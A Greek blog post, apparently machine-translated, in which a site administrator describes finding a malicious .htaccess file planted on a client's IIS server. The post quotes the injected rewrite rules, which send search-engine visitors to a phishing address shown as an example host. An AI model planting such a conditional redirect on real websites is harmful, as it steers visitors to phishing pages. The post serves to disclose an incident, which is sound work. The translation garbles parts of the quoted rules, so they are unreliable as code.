Πέμπτη, 22η του Ιανουαρίου, 2009 | Συγγραφέας:

Βρήκα πολύ πρόσφατα ένα πρόβλημα με την ιστοσελίδα του πελάτη οφείλεται σε .htaccess αρχείο. Ο ιστότοπος φιλοξενήθηκε σε ένα Παράθυρα διακομιστή που εκτελεί IIS χρησιμοποιώντας IISPassword, η οποία κάνει χρήση του .htaccess αρχεία για τις ρυθμίσεις του.

IISPassword δεν ακολουθεί ακριβώς τους ίδιους κανόνες με Apache ωστόσο. Αν το .htaccess αρχείο υπάρχει, τότε πρέπει IISPassword περιέχουν κατάλληλες διατάξεις, Αλλιώς ο διακομιστής επιστρέφει μόνο το ακόλουθο μήνυμα λάθους:

Error 500 given by IIS Password
Εδώ είναι το περιεχόμενο του αρχείου .htaccess. Έχω μόνο τροποποίησε την τελική διεύθυνση URL ανακατεύθυνσης στο σημείο να Example.com κατάλληλα:

RewriteEngine Από
RewriteCond %{HTTP_REFERER} .*google. * $ [NC,Ή]
RewriteCond %{HTTP_REFERER} .*AOL. * $ [NC,Ή]
RewriteCond %{HTTP_REFERER} .*msn. * $ [NC,Ή]
RewriteCond %{HTTP_REFERER} .*yahoo. * $ [NC,Ή]
RewriteCond %{HTTP_REFERER} .*Yandex. * $ [NC,Ή]
RewriteCond %{HTTP_REFERER} .*rambler. * $ [NC,Ή]
RewriteCond %{HTTP_REFERER} .*α. * $ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

Εάν αυτή η ήταν σε ένα διακομιστή που εκτελεί με Apache mod_rewrite, περισσότεροι χρήστες του Διαδικτύου θα πάει κατευθείαν στο σωστό περιεχόμενο του ιστοτόπου. Μόνο αν έφτασαν στην περιοχή μέσα από τις μηχανές αναζήτησης και ευρετήρια που απαριθμούνται στο .htaccess, θα μπορούν να κατευθυνθούν προς την siffy url phishing ότι η πυρόλυσης θέλει να φτάσει τα θύματα.

Φυσικά, η πυρόλυσης (ή ίσως ακόμη και ένα αυτοματοποιημένο σκουλήκι) Δεν είχα συνειδητοποιήσει ότι ο εν λόγω διακομιστής δεν υποστηρίζει καν αυτούς τους κανόνες mod_rewrite. Αλλά σε κάθε περίπτωση, Αυτό είναι πολύ ανησυχητικό, όπως μπορώ να προβλέψω πολλά επιχειρήματα για το αν ή όχι η περιοχή είναι εργασίας

Μερίδιο
Κατηγορία: φιλοξενία, τυχαίος
Μπορείτε να ακολουθήσετε οποιεσδήποτε απαντήσεις σε αυτή την καταχώρηση μέσω του RSS 2.0 τροφή. Μπορείτε να αφήσετε μια απάντηση, ή trackback από το δικό σου site.
Αφήστε μια απάντηση » Σύνδεση